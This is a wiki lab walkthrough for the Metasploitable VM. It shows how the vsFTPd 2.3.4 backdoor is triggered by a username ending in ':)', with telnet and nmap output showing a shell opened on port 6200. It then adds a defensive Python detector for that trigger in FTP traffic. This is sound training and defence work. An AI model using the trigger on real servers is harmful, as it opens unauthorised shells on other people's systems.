Metasploitable/VSFTP
From charlesreid1
The Background
VSFTP (vsFTPd) is an FTP server program. The particular build of VSFTP included on the Metasploitable virtual machine (vsFTPd 2.3.4, as its banner shows in the session below) contains a vulnerability that opens a backdoor shell.
If a client attempts to connect using a username that ends in a smiley :), it opens a backdoor shell listening on port 6200. (Kind of like 2600 - get it?)
Opening the Backdoor
The procedure for opening a backdoor on port 6200 with VSFTP is as follows:
We begin by scanning the Metasploitable virtual machine at 10.0.0.27, to show that port 6200 is closed:
    root@morpheus:~# nmap -sS -sV -A -p 6200 10.0.0.27

    Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-25 06:29 PDT
    Nmap scan report for 10.0.0.27
    Host is up (0.00083s latency).
    PORT     STATE  SERVICE VERSION
    6200/tcp closed unknown
    MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC)
    Too many fingerprints match this host to give specific OS details
    Network Distance: 1 hop

    TRACEROUTE
    HOP RTT     ADDRESS
    1   0.83 ms 10.0.0.27

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 2.96 seconds
Now, in another window, we open the backdoor:
    root@morpheus:~# telnet 10.0.0.27 21
    Trying 10.0.0.27...
    Connected to 10.0.0.27.
    Escape character is '^]'.
    220 (vsFTPd 2.3.4)
    user backdoored:)
    331 Please specify the password.
    pass doesnotmatter
You can close that window - you're done with it.
Now take a look at the same port 6200 with nmap:
    root@morpheus:~# nmap -sS -sV -A -p 6200 10.0.0.27

    Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-25 06:30 PDT
    WARNING: RST from 10.0.0.27 port 6200 -- is this port really open?
    WARNING: RST from 10.0.0.27 port 6200 -- is this port really open?
    WARNING: RST from 10.0.0.27 port 6200 -- is this port really open?
    WARNING: RST from 10.0.0.27 port 6200 -- is this port really open?
    WARNING: RST from 10.0.0.27 port 6200 -- is this port really open?
    WARNING: RST from 10.0.0.27 port 6200 -- is this port really open?
    Nmap scan report for 10.0.0.27
    Host is up (0.00088s latency).
    PORT     STATE SERVICE VERSION
    6200/tcp open  unknown
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port6200-TCP:V=7.01%I=7%D=3/25%Time=56F53D70%P=x86_64-pc-linux-gnu%r(Ge
    SF:nericLines,42,"sh:\x20line\x201:\x20\r:\x20command\x20not\x20found\nsh:
    SF:\x20line\x202:\x20\r:\x20command\x20not\x20found\n");
    MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 2.4.X
    OS CPE: cpe:/o:linux:linux_kernel:2.4.21
    OS details: Linux 2.4.21
    Network Distance: 1 hop

    TRACEROUTE
    HOP RTT     ADDRESS
    1   0.88 ms 10.0.0.27

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 13.94 seconds
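Note what the second scan's fingerprint tells a defender: nmap's probe was answered with "sh: line 1: \r: command not found", i.e. a bare shell is reading whatever arrives on port 6200. The blue-team counterpart of the procedure above is to catch the trigger on the control channel (port 21) before that shell ever appears. The following is an added example written for this page, not code from the original article, from vsftpd, or from Metasploit. It scans lines captured from an FTP control-channel session (for instance a "follow TCP stream" export or an IDS packet log; the input format is an assumption) and flags any USER command whose name contains the ":)" sequence, and it includes a plain connect-and-close check for whether a port such as 6200 is currently listening. The sample session is constructed and mirrors the telnet exchange above.

```python
"""Detect the vsFTPd 2.3.4 backdoor trigger in captured FTP control-channel traffic.

Added example for this wiki page (not part of the original article, vsftpd or
Metasploit). Input is a list of text lines from the port 21 control channel;
that format is an assumption. The sample session at the bottom is constructed.
"""
import re
import socket
from dataclasses import dataclass

# FTP commands are case-insensitive (RFC 959), so "user" and "USER" both match.
USER_CMD = re.compile(r"^\s*USER\s+(?P<name>.*?)\s*$", re.IGNORECASE)

# The backdoored vsFTPd 2.3.4 build reacts to this sequence in the username.
TRIGGER = ":)"


@dataclass(frozen=True)
class Alert:
    line_no: int   # 1-based line in the captured session
    username: str  # the USER argument as sent by the client
    reason: str


def scan_control_channel(lines):
    """Return one Alert per USER command whose username contains the trigger."""
    alerts = []
    for n, raw in enumerate(lines, start=1):
        m = USER_CMD.match(raw.rstrip("\r\n"))
        if not m:
            continue
        name = m.group("name")
        if TRIGGER in name:
            alerts.append(Alert(n, name, "vsftpd 2.3.4 backdoor trigger ':)' in USER command"))
    return alerts


def port_is_open(host, port, timeout=1.0):
    """True if a TCP connection to host:port succeeds; connects and closes, sends nothing.

    Mirrors the nmap check on port 6200 above. Assumption: the machine running
    this can reach the FTP host directly.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


# Constructed sample: an ordinary login followed by the session shown on this page.
SAMPLE_SESSION = [
    "220 (vsFTPd 2.3.4)",
    "USER alice",
    "331 Please specify the password.",
    "PASS s3cret",
    "230 Login successful.",
    "QUIT",
    "220 (vsFTPd 2.3.4)",
    "user backdoored:)",       # lower-case, exactly as typed in the telnet session
    "331 Please specify the password.",
    "pass doesnotmatter",
]

if __name__ == "__main__":
    for a in scan_control_channel(SAMPLE_SESSION):
        print(f"line {a.line_no}: USER {a.username!r} -> {a.reason}")
```

Run against the sample session it reports the single line 8 login; the first, legitimate login produces nothing. Matching on the USER argument rather than on a fixed username matters because the trigger is the ":)" sequence, not the word in front of it, and the regex is case-insensitive because the session above uses lower-case "user" and the server accepts it. The same logic is easy to carry into an IDS rule that inspects port 21 traffic for the same two characters inside a USER command.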